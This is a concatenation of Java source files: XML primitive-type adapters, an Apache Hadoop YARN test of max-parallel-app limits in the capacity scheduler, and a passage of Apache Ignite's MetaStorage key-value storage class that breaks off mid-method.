        // Base class for adapters that serialize a value as a single text node of its
        // toString() form; subclasses only implement type() and deserialize().
        private static abstract class ToStringTextNodeAdapter<T> implements JavaxXmlAdapter<T>
        {
            @Override
            public Node serialize( Document document, Object object, Function<Object, Node> serialize )
            {
                return document.createTextNode( object.toString() );
            }
        }

        private static class StringAdapter extends ToStringTextNodeAdapter<String>
        {
            @Override
            public Class<String> type() { return String.class; }

            @Override
            public String deserialize( Node node, BiFunction<Node, ValueType, Object> deserialize )
            {
                return node.getNodeValue();
            }
        }

        private static class CharacterAdapter extends ToStringTextNodeAdapter<Character>
        {
            @Override
            public Class<Character> type() { return Character.class; }

            @Override
            public Character deserialize( Node node, BiFunction<Node, ValueType, Object> deserialize )
            {
                // An empty text node deserializes to null, not to a character.
                String string = node.getNodeValue();
                return string.isEmpty() ? null : string.charAt( 0 );
            }
        }

        private static class BooleanAdapter extends ToStringTextNodeAdapter<Boolean>
        {
            @Override
            public Class<Boolean> type() { return Boolean.class; }

            @Override
            public Boolean deserialize( Node node, BiFunction<Node, ValueType, Object> deserialize )
            {
                return Boolean.valueOf( node.getNodeValue() );
            }
        }

        private static class IntegerAdapter extends ToStringTextNodeAdapter<Integer>
        {
            @Override
            public Class<Integer> type() { return Integer.class; }

            @Override
            public Integer deserialize( Node node, BiFunction<Node, ValueType, Object> deserialize )
            {
                return Integer.valueOf( node.getNodeValue() );
            }
        }

        private static class LongAdapter extends ToStringTextNodeAdapter<Long>
        {
            @Override
            public Class<Long> type() { return Long.class; }

            @Override
            public Long deserialize( Node node, BiFunction<Node, ValueType, Object> deserialize )
            {
                return Long.valueOf( node.getNodeValue() );
            }
        }

        private static class ShortAdapter extends ToStringTextNodeAdapter<Short>
        {
            @Override
            public Class<Short> type() { return Short.class; }

            @Override
            public Short deserialize( Node node, BiFunction<Node, ValueType, Object> deserialize )
            {
                return Short.valueOf( node.getNodeValue() );
            }
        }

        private static class ByteAdapter extends ToStringTextNodeAdapter<Byte>
        {
            @Override
            public Class<Byte> type() { return Byte.class; }

            @Override
            public Byte deserialize( Node node, BiFunction<Node, ValueType, Object> deserialize )
            {
                return Byte.valueOf( node.getNodeValue() );
            }
        }

        private static class FloatAdapter extends ToStringTextNodeAdapter<Float>
        {
            @Override
            public Class<Float> type() { return Float.class; }

            @Override
            public Float deserialize( Node node, BiFunction<Node, ValueType, Object> deserialize )
            {
                return Float.valueOf( node.getNodeValue() );
            }
        }

        private static class DoubleAdapter extends ToStringTextNodeAdapter<Double>
        {
            @Override
            public Class<Double> type() { return Double.class; }

            @Override
            public Double deserialize( Node node, BiFunction<Node, ValueType, Object> deserialize )
            {
                return Double.valueOf( node.getNodeValue() );
            }
        }
    }
}
/** * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.hadoop.yarn.server.resourcemanager.scheduler.capacity; import static org.apache.hadoop.yarn.server.resourcemanager.scheduler.capacity.CapacitySchedulerConfiguration.PREFIX; import static org.junit.Assert.assertEquals; import static org.mockito.ArgumentMatchers.any; import static org.mockito.ArgumentMatchers.anyString; import static org.mockito.Mockito.mock; import static org.mockito.Mockito.when; import java.io.IOException; import java.util.ArrayList; import java.util.Arrays; import java.util.Iterator; import java.util.List; import java.util.concurrent.ConcurrentHashMap; import org.apache.hadoop.yarn.api.records.ApplicationAttemptId; import org.apache.hadoop.yarn.api.records.ApplicationId; import org.apache.hadoop.yarn.api.records.Priority; import org.apache.hadoop.yarn.api.records.Resource; import org.apache.hadoop.yarn.server.resourcemanager.RMContext; import org.apache.hadoop.yarn.server.resourcemanager.nodelabels.RMNodeLabelsManager; import org.apache.hadoop.yarn.server.resourcemanager.scheduler.activities.ActivitiesManager; import org.apache.hadoop.yarn.server.resourcemanager.scheduler.capacity.preemption.PreemptionManager; import 
org.apache.hadoop.yarn.server.resourcemanager.scheduler.common.fica.FiCaSchedulerApp;
import org.apache.hadoop.yarn.server.resourcemanager.security.AppPriorityACLsManager;
import org.apache.hadoop.yarn.util.ControlledClock;
import org.apache.hadoop.yarn.util.resource.DefaultResourceCalculator;
import org.junit.Before;
import org.junit.Test;

/**
 * Tests for {@link CSMaxRunningAppsEnforcer}: verifies how the max-parallel-apps
 * limits on queues and users make applications runnable/non-runnable, and how
 * removing a running app promotes queued apps (ordered by start time).
 */
public class TestCSMaxRunningAppsEnforcer {
  private CapacitySchedulerQueueManager queueManager;
  private CSMaxRunningAppsEnforcer maxAppsEnforcer;
  // Monotonic counter used to mint unique ApplicationIds.
  private int appNum;
  // Controlled clock so tests can deterministically order app start times.
  private ControlledClock clock;
  private RMContext rmContext;
  private CapacityScheduler scheduler;
  private ActivitiesManager activitiesManager;
  private CapacitySchedulerConfiguration csConfig;

  @Before
  public void setup() throws IOException {
    // Wire a mocked scheduler/RMContext pair around a real queue manager so the
    // enforcer operates on genuine LeafQueue/ParentQueue state.
    csConfig = new CapacitySchedulerConfiguration();
    rmContext = mock(RMContext.class);
    when(rmContext.getYarnConfiguration()).thenReturn(csConfig);
    when(rmContext.getRMApps()).thenReturn(new ConcurrentHashMap<>());
    clock = new ControlledClock();
    scheduler = mock(CapacityScheduler.class);
    when(rmContext.getScheduler()).thenReturn(scheduler);
    when(scheduler.getConf()).thenReturn(csConfig);
    when(scheduler.getConfig()).thenReturn(csConfig);
    when(scheduler.getConfiguration()).thenReturn(csConfig);
    when(scheduler.getResourceCalculator()).thenReturn(
        new DefaultResourceCalculator());
    when(scheduler.getRMContext()).thenReturn(rmContext);
    Resource clusterResource = Resource.newInstance(16384, 8);
    when(scheduler.getClusterResource())
        .thenReturn(clusterResource);
    when(scheduler.getMinimumAllocation())
        .thenReturn(Resource.newInstance(1024, 1));
    when(scheduler.getMinimumResourceCapability())
        .thenReturn(Resource.newInstance(1024, 1));
    activitiesManager = mock(ActivitiesManager.class);
    maxAppsEnforcer = new CSMaxRunningAppsEnforcer(scheduler);
    appNum = 0;
    setupQueues(csConfig);
    RMNodeLabelsManager labelManager = mock(RMNodeLabelsManager.class);
    AppPriorityACLsManager appPriorityACLManager =
        mock(AppPriorityACLsManager.class);
    when(rmContext.getNodeLabelManager()).thenReturn(labelManager);
    when(labelManager.getResourceByLabel(any(), any(Resource.class)))
        .thenReturn(clusterResource);
    PreemptionManager preemptionManager = mock(PreemptionManager.class);
    when(preemptionManager.getKillableResource(any(), anyString()))
        .thenReturn(Resource.newInstance(0, 0));
    when(scheduler.getPreemptionManager()).thenReturn(preemptionManager);
    queueManager = new CapacitySchedulerQueueManager(csConfig,
        labelManager, appPriorityACLManager);
    queueManager.setCapacitySchedulerContext(scheduler);
    queueManager.initializeQueues(csConfig);
  }

  /**
   * Builds the queue hierarchy used by all tests:
   * root -> {queue1 -> {subqueue1 -> leaf1, subqueue2 -> leaf2}, queue2}.
   */
  private void setupQueues(CapacitySchedulerConfiguration config) {
    config.setQueues(CapacitySchedulerConfiguration.ROOT,
        new String[] {"queue1", "queue2"});
    config.setQueues("root.queue1", new String[] {"subqueue1", "subqueue2"});
    config.setQueues("root.queue1.subqueue1", new String[] {"leaf1"});
    config.setQueues("root.queue1.subqueue2", new String[] {"leaf2"});
    config.setFloat(PREFIX + "root.capacity", 100.0f);
    config.setFloat(PREFIX + "root.queue1.capacity", 50.0f);
    config.setFloat(PREFIX + "root.queue2.capacity", 50.0f);
    config.setFloat(PREFIX + "root.queue1.subqueue1.capacity", 50.0f);
    config.setFloat(PREFIX + "root.queue1.subqueue2.capacity", 50.0f);
    config.setFloat(PREFIX + "root.queue1.subqueue1.leaf1.capacity", 100.0f);
    config.setFloat(PREFIX + "root.queue1.subqueue2.leaf2.capacity", 100.0f);
  }

  /**
   * Creates an application attempt for {@code user}, stamps it with the current
   * controlled-clock time, runs it through the enforcer's runnability check and
   * submits it to {@code queue}.
   */
  private FiCaSchedulerApp addApp(LeafQueue queue, String user) {
    ApplicationId appId = ApplicationId.newInstance(0, appNum++);
    ApplicationAttemptId attId = ApplicationAttemptId.newInstance(appId, 0);
    FiCaSchedulerApp attempt = new FiCaSchedulerApp(attId, user, queue,
        queue.getAbstractUsersManager(), rmContext,
        Priority.newInstance(0), false, activitiesManager) {
      // Freeze the start time at creation so later clock ticks don't move it.
      private final long startTime = clock.getTime();

      @Override
      public long getStartTime() {
        return startTime;
      }
    };
    maxAppsEnforcer.checkRunnabilityWithUpdate(attempt);
    maxAppsEnforcer.trackApp(attempt);
    queue.submitApplicationAttempt(attempt, attempt.getUser());
    return attempt;
  }

  /** Finishes the attempt and lets the enforcer promote newly-runnable apps. */
  private void removeApp(FiCaSchedulerApp attempt) {
    LeafQueue queue = attempt.getCSLeafQueue();
    queue.finishApplicationAttempt(attempt, queue.getQueuePath());
    maxAppsEnforcer.untrackApp(attempt);
    maxAppsEnforcer.updateRunnabilityOnAppRemoval(attempt);
  }

  @Test
  public void testRemoveDoesNotEnableAnyApp() {
    // leaf1/leaf2 each allow 1 parallel app and root allows 2, so removing the
    // only app in leaf1 must not make leaf2's queued app runnable.
    ParentQueue root =
        (ParentQueue) queueManager.getRootQueue();
    LeafQueue leaf1 = (LeafQueue) queueManager
        .getQueueByFullName("root.queue1.subqueue1.leaf1");
    LeafQueue leaf2 = (LeafQueue) queueManager
        .getQueueByFullName("root.queue1.subqueue2.leaf2");
    root.setMaxParallelApps(2);
    leaf1.setMaxParallelApps(1);
    leaf2.setMaxParallelApps(1);
    FiCaSchedulerApp app1 = addApp(leaf1, "user");
    addApp(leaf2, "user");
    addApp(leaf2, "user");
    assertEquals(1, leaf1.getNumRunnableApps());
    assertEquals(1, leaf2.getNumRunnableApps());
    assertEquals(1, leaf2.getNumNonRunnableApps());
    removeApp(app1);
    assertEquals(0, leaf1.getNumRunnableApps());
    assertEquals(1, leaf2.getNumRunnableApps());
    assertEquals(1, leaf2.getNumNonRunnableApps());
  }

  @Test
  public void testRemoveEnablesAppOnCousinQueue() {
    // The limit sits on the shared parent queue1, so removing leaf1's app frees
    // a slot that leaf2's queued app can take.
    LeafQueue leaf1 = (LeafQueue) queueManager
        .getQueueByFullName("root.queue1.subqueue1.leaf1");
    LeafQueue leaf2 = (LeafQueue) queueManager
        .getQueueByFullName("root.queue1.subqueue2.leaf2");
    ParentQueue queue1 = (ParentQueue) queueManager
        .getQueueByFullName("root.queue1");
    queue1.setMaxParallelApps(2);
    FiCaSchedulerApp app1 = addApp(leaf1, "user");
    addApp(leaf2, "user");
    addApp(leaf2, "user");
    assertEquals(1, leaf1.getNumRunnableApps());
    assertEquals(1, leaf2.getNumRunnableApps());
    assertEquals(1, leaf2.getNumNonRunnableApps());
    removeApp(app1);
    assertEquals(0, leaf1.getNumRunnableApps());
    assertEquals(2, leaf2.getNumRunnableApps());
    assertEquals(0, leaf2.getNumNonRunnableApps());
  }

  @Test
  public void testRemoveEnablesOneByQueueOneByUser() {
    // Removing user1's app frees both a queue slot in leaf1 and user1's own
    // per-user slot, so one app in each leaf becomes runnable.
    LeafQueue leaf1 = (LeafQueue) queueManager
        .getQueueByFullName("root.queue1.subqueue1.leaf1");
    LeafQueue leaf2 = (LeafQueue) queueManager
        .getQueueByFullName("root.queue1.subqueue2.leaf2");
    leaf1.setMaxParallelApps(2);
    //userMaxApps.put("user1", 1);
    csConfig.setInt(PREFIX + "user.user1.max-parallel-apps", 1);
    FiCaSchedulerApp app1 = addApp(leaf1, "user1");
    addApp(leaf1, "user2");
    addApp(leaf1, "user3");
    addApp(leaf2, "user1");
    assertEquals(2, leaf1.getNumRunnableApps());
    assertEquals(1, leaf1.getNumNonRunnableApps());
    assertEquals(1, leaf2.getNumNonRunnableApps());
    removeApp(app1);
    assertEquals(2, leaf1.getNumRunnableApps());
    assertEquals(1, leaf2.getNumRunnableApps());
    assertEquals(0, leaf1.getNumNonRunnableApps());
    assertEquals(0, leaf2.getNumNonRunnableApps());
  }

  @Test
  public void testRemoveEnablingOrderedByStartTime() {
    // Two apps are queued; the earlier-started one (in leaf2) must be promoted
    // first when a slot opens up.
    LeafQueue leaf1 = (LeafQueue) queueManager
        .getQueueByFullName("root.queue1.subqueue1.leaf1");
    LeafQueue leaf2 = (LeafQueue) queueManager
        .getQueueByFullName("root.queue1.subqueue2.leaf2");
    ParentQueue queue1 = (ParentQueue) queueManager
        .getQueueByFullName("root.queue1");
    queue1.setMaxParallelApps(2);
    FiCaSchedulerApp app1 = addApp(leaf1, "user");
    addApp(leaf2, "user");
    addApp(leaf2, "user");
    clock.tickSec(20);
    addApp(leaf1, "user");
    assertEquals(1, leaf1.getNumRunnableApps());
    assertEquals(1, leaf2.getNumRunnableApps());
    assertEquals(1, leaf1.getNumNonRunnableApps());
    assertEquals(1, leaf2.getNumNonRunnableApps());
    removeApp(app1);
    assertEquals(0, leaf1.getNumRunnableApps());
    assertEquals(2, leaf2.getNumRunnableApps());
    assertEquals(0, leaf2.getNumNonRunnableApps());
  }

  @Test
  public void testMultipleAppsWaitingOnCousinQueue() {
    // Only one of the several apps queued in leaf2 may be promoted when a
    // single slot frees up on the shared parent.
    LeafQueue leaf1 = (LeafQueue) queueManager
        .getQueueByFullName("root.queue1.subqueue1.leaf1");
    LeafQueue leaf2 = (LeafQueue) queueManager
        .getQueueByFullName("root.queue1.subqueue2.leaf2");
    ParentQueue queue1 = (ParentQueue) queueManager
        .getQueueByFullName("root.queue1");
    queue1.setMaxParallelApps(2);
    FiCaSchedulerApp app1 = addApp(leaf1, "user");
    addApp(leaf2, "user");
    addApp(leaf2, "user");
    addApp(leaf2, "user");
    assertEquals(1, leaf1.getNumRunnableApps());
    assertEquals(1, leaf2.getNumRunnableApps());
    assertEquals(2, leaf2.getNumNonRunnableApps());
    removeApp(app1);
    assertEquals(0, leaf1.getNumRunnableApps());
    assertEquals(2, leaf2.getNumRunnableApps());
    assertEquals(1, leaf2.getNumNonRunnableApps());
  }

  @Test
  public void testMultiListStartTimeIteratorEmptyAppLists() {
    // NOTE(review): despite the name, the lists each hold one mocked attempt;
    // the test checks the iterator yields attempts in start-time order.
    List<List<FiCaSchedulerApp>> lists =
        new ArrayList<List<FiCaSchedulerApp>>();
    lists.add(Arrays.asList(mockAppAttempt(1)));
    lists.add(Arrays.asList(mockAppAttempt(2)));
    Iterator<FiCaSchedulerApp> iter =
        new CSMaxRunningAppsEnforcer.MultiListStartTimeIterator(lists);
    assertEquals(1, iter.next().getStartTime());
    assertEquals(2, iter.next().getStartTime());
  }

  /** Returns a mocked attempt whose only stubbed behavior is its start time. */
  private FiCaSchedulerApp mockAppAttempt(long startTime) {
    FiCaSchedulerApp schedApp = mock(FiCaSchedulerApp.class);
    when(schedApp.getStartTime()).thenReturn(startTime);
    return schedApp;
  }
}
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.ignite.internal.processors.cache.persistence.metastorage; import java.io.Closeable; import java.io.File; import java.io.IOException; import java.io.RandomAccessFile; import java.io.Serializable; import java.nio.ByteBuffer; import java.nio.charset.StandardCharsets; import java.util.ArrayList; import java.util.Arrays; import java.util.Collections; import java.util.HashSet; import java.util.Iterator; import java.util.List; import java.util.Map; import java.util.Set; import java.util.SortedMap; import java.util.TreeMap; import java.util.concurrent.Executor; import java.util.concurrent.atomic.AtomicLong; import java.util.function.BiConsumer; import java.util.stream.Stream; import org.apache.ignite.IgniteCheckedException; import org.apache.ignite.IgniteException; import org.apache.ignite.IgniteLogger; import org.apache.ignite.internal.metric.IoStatisticsHolderNoOp; import org.apache.ignite.internal.pagemem.FullPageId; import org.apache.ignite.internal.pagemem.PageIdAllocator; import org.apache.ignite.internal.pagemem.PageIdUtils; import org.apache.ignite.internal.pagemem.PageMemory; import org.apache.ignite.internal.pagemem.store.PageStore; import 
org.apache.ignite.internal.pagemem.wal.IgniteWriteAheadLogManager; import org.apache.ignite.internal.pagemem.wal.record.MetastoreDataRecord; import org.apache.ignite.internal.pagemem.wal.record.delta.MetaPageInitRecord; import org.apache.ignite.internal.processors.cache.GridCacheSharedContext; import org.apache.ignite.internal.processors.cache.persistence.DataRegion; import org.apache.ignite.internal.processors.cache.persistence.GridCacheDatabaseSharedManager; import org.apache.ignite.internal.processors.cache.persistence.IgniteCacheDatabaseSharedManager; import org.apache.ignite.internal.processors.cache.persistence.RootPage; import org.apache.ignite.internal.processors.cache.persistence.StorageException; import org.apache.ignite.internal.processors.cache.persistence.checkpoint.CheckpointListener; import org.apache.ignite.internal.processors.cache.persistence.file.FilePageStoreManager; import org.apache.ignite.internal.processors.cache.persistence.pagemem.PageMemoryEx; import org.apache.ignite.internal.processors.cache.persistence.pagemem.PageMetrics; import org.apache.ignite.internal.processors.cache.persistence.partstorage.PartitionMetaStorageImpl; import org.apache.ignite.internal.processors.cache.persistence.tree.io.PageIO; import org.apache.ignite.internal.processors.cache.persistence.tree.io.PagePartitionMetaIO; import org.apache.ignite.internal.processors.cache.persistence.tree.util.PageHandler; import org.apache.ignite.internal.processors.cache.persistence.wal.WALPointer; import org.apache.ignite.internal.util.lang.GridCursor; import org.apache.ignite.internal.util.typedef.internal.CU; import org.apache.ignite.internal.util.typedef.internal.U; import org.apache.ignite.lang.IgniteBiTuple; import org.apache.ignite.marshaller.Marshaller; import org.apache.ignite.marshaller.jdk.JdkMarshaller; import org.jetbrains.annotations.NotNull; import static org.apache.ignite.internal.pagemem.PageIdAllocator.FLAG_AUX; import static 
org.apache.ignite.internal.pagemem.PageIdAllocator.FLAG_DATA;

/**
 * General purpose key-value local-only storage.
 */
public class MetaStorage implements CheckpointListener, ReadWriteMetastorage {
    /** */
    public static final String METASTORAGE_CACHE_NAME = "MetaStorage";

    /** */
    public static final int METASTORAGE_CACHE_ID = CU.cacheId(METASTORAGE_CACHE_NAME);

    /** Metastorage cache directory to store data. */
    public static final String METASTORAGE_DIR_NAME = "metastorage";

    /** Old special partition reserved for metastore space. */
    public static final int OLD_METASTORE_PARTITION = 0x0;

    /** Special partition reserved for metastore space. */
    public static final int METASTORE_PARTITION = 0x1;

    /** The set of all metastorage partitions. */
    public static final Set<Integer> METASTORAGE_PARTITIONS =
        Collections.unmodifiableSet(new HashSet<>(Arrays.asList(OLD_METASTORE_PARTITION, METASTORE_PARTITION)));

    /** This flag is used ONLY FOR TESTING the migration of a metastorage from Part 0 to Part 1. */
    public static boolean PRESERVE_LEGACY_METASTORAGE_PARTITION_ID = false;

    /** Marker for removed entry. Compared by identity (==), never by content. */
    private static final byte[] TOMBSTONE = new byte[0];

    /** Temporary metastorage memory size. */
    private static final int TEMPORARY_METASTORAGE_IN_MEMORY_SIZE = 128 * 1024 * 1024;

    /** Temporary metastorage buffer size (file). */
    private static final int TEMPORARY_METASTORAGE_BUFFER_SIZE = 1024 * 1024;

    /** Write-ahead log manager, taken from the shared context. */
    private final IgniteWriteAheadLogManager wal;

    /** Data region hosting metastorage pages. */
    private final DataRegion dataRegion;

    /** */
    private final IgniteLogger log;

    /** B+ tree index over metastorage entries. */
    private MetastorageTree tree;

    /** Global remove id counter persisted in the partition meta page. */
    private AtomicLong rmvId = new AtomicLong();

    /** */
    private final boolean readOnly;

    /** True when the partition meta page has not been initialized yet. */
    private boolean empty;

    /** */
    private RootPage treeRoot;

    /** */
    private RootPage reuseListRoot;

    /** */
    private PartitionMetaStorageImpl<MetastorageRowStoreEntry> partStorage;

    /** Pending updates applied while in read-only mode (WAL replay); TOMBSTONE marks removals. */
    private SortedMap<String, byte[]> lastUpdates;

    /** */
    private final Marshaller marshaller = JdkMarshaller.DEFAULT;

    /** Partition id. */
    private int partId;

    /** Cctx. */
    private final GridCacheSharedContext<?, ?> cctx;

    /** */
    public MetaStorage(
        GridCacheSharedContext<?, ?> cctx,
        DataRegion dataRegion,
        boolean readOnly
    ) {
        this.cctx = cctx;
        wal = cctx.wal();
        this.dataRegion = dataRegion;
        this.readOnly = readOnly;
        log = cctx.logger(getClass());
    }

    /** */
    public void init(GridCacheDatabaseSharedManager db) throws IgniteCheckedException {
        dataRegion.metrics().clear();

        initInternal(db);

        if (!PRESERVE_LEGACY_METASTORAGE_PARTITION_ID) {
            // Migration from partition 0 to partition 1: copy data aside now, and
            // once the new partition is in use, truncate the legacy stores on the
            // next checkpoint.
            if (partId == OLD_METASTORE_PARTITION)
                db.temporaryMetaStorage(copyDataToTmpStorage());
            else if (db.temporaryMetaStorage() != null) {
                restoreDataFromTmpStorage(db.temporaryMetaStorage());

                db.temporaryMetaStorage(null);

                db.addCheckpointListener(new CheckpointListener() {
                    /** {@inheritDoc} */
                    @Override public void onMarkCheckpointBegin(Context ctx) {
                    }

                    /** {@inheritDoc} */
                    @Override public void onCheckpointBegin(Context ctx) throws IgniteCheckedException {
                        assert cctx.pageStore() != null;

                        // Drop the legacy metastore partition and index partition;
                        // this listener removes itself after running once.
                        int partTag = ((PageMemoryEx)dataRegion.pageMemory()).invalidate(METASTORAGE_CACHE_ID,
                            OLD_METASTORE_PARTITION);
                        cctx.pageStore().truncate(METASTORAGE_CACHE_ID, OLD_METASTORE_PARTITION, partTag);

                        int idxTag = ((PageMemoryEx)dataRegion.pageMemory()).invalidate(METASTORAGE_CACHE_ID,
                            PageIdAllocator.INDEX_PARTITION);
                        PageStore store = ((FilePageStoreManager)cctx.pageStore()).getStore(METASTORAGE_CACHE_ID,
                            PageIdAllocator.INDEX_PARTITION);
                        store.truncate(idxTag);

                        db.removeCheckpointListener(this);
                    }

                    /** {@inheritDoc} */
                    @Override public void beforeCheckpointBegin(Context ctx) {
                    }
                }, dataRegion);
            }
        }
    }

    /** Frees the allocated resources. */
    public void close() {
        if (tree != null)
            tree.close();

        if (partStorage != null)
            partStorage.close();
    }

    /**
     * Copying all data from the 'meta' to temporary storage.
     *
     * @return Target temporary storage
     */
    private TmpStorage copyDataToTmpStorage() throws IgniteCheckedException {
        TmpStorage tmpStorage = new TmpStorage(TEMPORARY_METASTORAGE_IN_MEMORY_SIZE, log);

        GridCursor<MetastorageDataRow> cur = tree.find(null, null);

        while (cur.next()) {
            MetastorageDataRow row = cur.get();

            tmpStorage.add(row.key(), partStorage.readRow(row.link()));
        }

        return tmpStorage;
    }

    /**
     * Data recovery from temporary storage
     *
     * @param tmpStorage temporary storage.
     */
    private void restoreDataFromTmpStorage(TmpStorage tmpStorage) throws IgniteCheckedException {
        for (Iterator<IgniteBiTuple<String, byte[]>> it = tmpStorage.stream().iterator(); it.hasNext(); ) {
            IgniteBiTuple<String, byte[]> t = it.next();

            writeRaw(t.get1(), t.get2());
        }

        try {
            tmpStorage.close();
        }
        catch (IOException e) {
            // Best-effort cleanup of the temp file; data is already restored.
            log.error(e.getMessage(), e);
        }
    }

    /**
     * @param db Database.
     */
    private void initInternal(IgniteCacheDatabaseSharedManager db) throws IgniteCheckedException {
        // Choose which partition to use. In read-only mode, fall through to the
        // new partition only if the legacy one turns out to be empty.
        if (PRESERVE_LEGACY_METASTORAGE_PARTITION_ID)
            getOrAllocateMetas(partId = OLD_METASTORE_PARTITION);
        else if (!readOnly || getOrAllocateMetas(partId = OLD_METASTORE_PARTITION))
            getOrAllocateMetas(partId = METASTORE_PARTITION);

        if (!empty) {
            String freeListName = METASTORAGE_CACHE_NAME + "##FreeList";
            String treeName = METASTORAGE_CACHE_NAME + "##Tree";

            partStorage = new PartitionMetaStorageImpl<MetastorageRowStoreEntry>(
                METASTORAGE_CACHE_ID,
                freeListName,
                dataRegion,
                null,
                wal,
                reuseListRoot.pageId().pageId(),
                reuseListRoot.isAllocated(),
                cctx.diagnostic().pageLockTracker(),
                cctx.kernalContext(),
                null,
                FLAG_AUX
            ) {
                // Metastorage pages are always allocated with the AUX flag.
                @Override protected long allocatePageNoReuse() throws IgniteCheckedException {
                    return pageMem.allocatePage(grpId, partId, FLAG_AUX);
                }
            };

            MetastorageRowStore rowStore = new MetastorageRowStore(partStorage, db);

            tree = new MetastorageTree(
                METASTORAGE_CACHE_ID,
                treeName,
                dataRegion.pageMemory(),
                wal,
                rmvId,
                partStorage,
                rowStore,
                treeRoot.pageId().pageId(),
                treeRoot.isAllocated(),
                cctx.kernalContext().failure(),
                cctx.diagnostic().pageLockTracker(),
                partId
            );

            if (!readOnly)
                ((GridCacheDatabaseSharedManager)db).addCheckpointListener(this, dataRegion);
        }
    }

    /** {@inheritDoc} */
    @Override public Serializable read(String key) throws IgniteCheckedException {
        byte[] data = readRaw(key);

        Serializable res = null;

        if (data != null)
            res = marshaller.unmarshal(data, U.gridClassLoader());

        return res;
    }

    /** {@inheritDoc} */
    @Override public void iterate(
        String keyPrefix,
        BiConsumer<String, ? super Serializable> cb,
        boolean unmarshal
    ) throws IgniteCheckedException {
        if (empty)
            return;

        // In read-only mode, merge the in-memory pending updates (lastUpdates)
        // with the on-disk tree, preferring the pending value on key collision.
        Iterator<Map.Entry<String, byte[]>> updatesIter = null;

        if (readOnly) {
            if (lastUpdates != null) {
                SortedMap<String, byte[]> prefixedSubmap = lastUpdates.subMap(keyPrefix, keyPrefix + "\uFFFF");

                if (!prefixedSubmap.isEmpty())
                    updatesIter = prefixedSubmap.entrySet().iterator();
            }
        }

        Map.Entry<String, byte[]> curUpdatesEntry = null;

        if (updatesIter != null) {
            assert updatesIter.hasNext();

            curUpdatesEntry = updatesIter.next();
        }

        MetastorageSearchRow lower = new MetastorageSearchRow(keyPrefix);
        MetastorageSearchRow upper = new MetastorageSearchRow(keyPrefix + "\uFFFF");

        GridCursor<MetastorageDataRow> cur = tree.find(lower, upper);

        while (cur.next()) {
            MetastorageDataRow row = cur.get();

            String key = row.key();
            byte[] valBytes = partStorage.readRow(row.link());

            int c = 0;

            // Flush pending updates whose keys sort before the current tree key.
            while (curUpdatesEntry != null && (c = curUpdatesEntry.getKey().compareTo(key)) < 0)
                curUpdatesEntry = advanceCurrentUpdatesEntry(cb, unmarshal, updatesIter, curUpdatesEntry);

            // Same key: pending update wins over the tree row.
            if (curUpdatesEntry != null && c == 0)
                curUpdatesEntry = advanceCurrentUpdatesEntry(cb, unmarshal, updatesIter, curUpdatesEntry);
            else
                applyCallback(cb, unmarshal, key, valBytes);
        }

        // Drain pending updates sorting after the last tree key.
        while (curUpdatesEntry != null)
            curUpdatesEntry = advanceCurrentUpdatesEntry(cb, unmarshal, updatesIter, curUpdatesEntry);
    }

    /** */
    private Map.Entry<String, byte[]> advanceCurrentUpdatesEntry(
        BiConsumer<String, ? super Serializable> cb,
        boolean unmarshal,
        Iterator<Map.Entry<String, byte[]>> updatesIter,
        Map.Entry<String, byte[]> curUpdatesEntry
    ) throws IgniteCheckedException {
        applyCallback(cb, unmarshal, curUpdatesEntry.getKey(), curUpdatesEntry.getValue());

        return updatesIter.hasNext() ? updatesIter.next() : null;
    }

    /** */
    private void applyCallback(
        BiConsumer<String, ? super Serializable> cb,
        boolean unmarshal,
        String key,
        byte[] valBytes
    ) throws IgniteCheckedException {
        // Identity comparison on purpose: TOMBSTONE marks removed entries.
        if (valBytes != TOMBSTONE) {
            if (unmarshal) {
                Serializable val = marshaller.unmarshal(valBytes, U.gridClassLoader());

                cb.accept(key, val);
            }
            else
                cb.accept(key, valBytes);
        }
    }

    /** {@inheritDoc} */
    @Override public void write(@NotNull String key, @NotNull Serializable val) throws IgniteCheckedException {
        assert val != null;

        if (!readOnly)
            writeRaw(key, marshaller.marshal(val));
    }

    /** {@inheritDoc} */
    @Override public void remove(@NotNull String key) throws IgniteCheckedException {
        removeData(key);
    }

    /** {@inheritDoc} */
    @Override public void writeRaw(String key, byte[] data) throws IgniteCheckedException {
        if (!readOnly) {
            WALPointer ptr;

            synchronized (this) {
                // WAL record is logged before mutating the tree so recovery can replay it.
                ptr = wal.log(new MetastoreDataRecord(key, data));

                MetastorageDataRow oldRow = tree.findOne(new MetastorageSearchRow(key));

                byte[] keyBytes = key.getBytes();

                long keyLink;

                // Oversized keys are stored out-of-line in the row store.
                if (oldRow != null)
                    keyLink = oldRow.keyLink();
                else if (keyBytes.length > MetastorageTree.MAX_KEY_LEN)
                    keyLink = tree.rowStore().addRow(keyBytes);
                else
                    keyLink = 0L;

                long dataLink = tree.rowStore().addRow(data);

                tree.put(new MetastorageDataRow(dataLink, key, keyLink));

                if (oldRow != null)
                    tree.rowStore().removeRow(oldRow.link());
            }

            wal.flush(ptr, false);
        }
    }

    /** {@inheritDoc} */
    @Override public byte[] readRaw(String key) throws IgniteCheckedException {
        if (readOnly) {
            if (lastUpdates != null) {
                byte[] res = lastUpdates.get(key);

                if (res != null)
                    return res != TOMBSTONE ? res : null;
            }

            if (empty)
                return null;
        }

        MetastorageDataRow row = tree.findOne(new MetastorageSearchRow(key));

        if (row == null)
            return null;

        return partStorage.readRow(row.link());
    }

    /** */
    public void removeData(String key) throws IgniteCheckedException {
        if (!readOnly) {
            WALPointer ptr;

            synchronized (this) {
                MetastorageDataRow oldRow = tree.findOne(new MetastorageSearchRow(key));

                if (oldRow == null)
                    return;

                // A null-value record in the WAL encodes a removal.
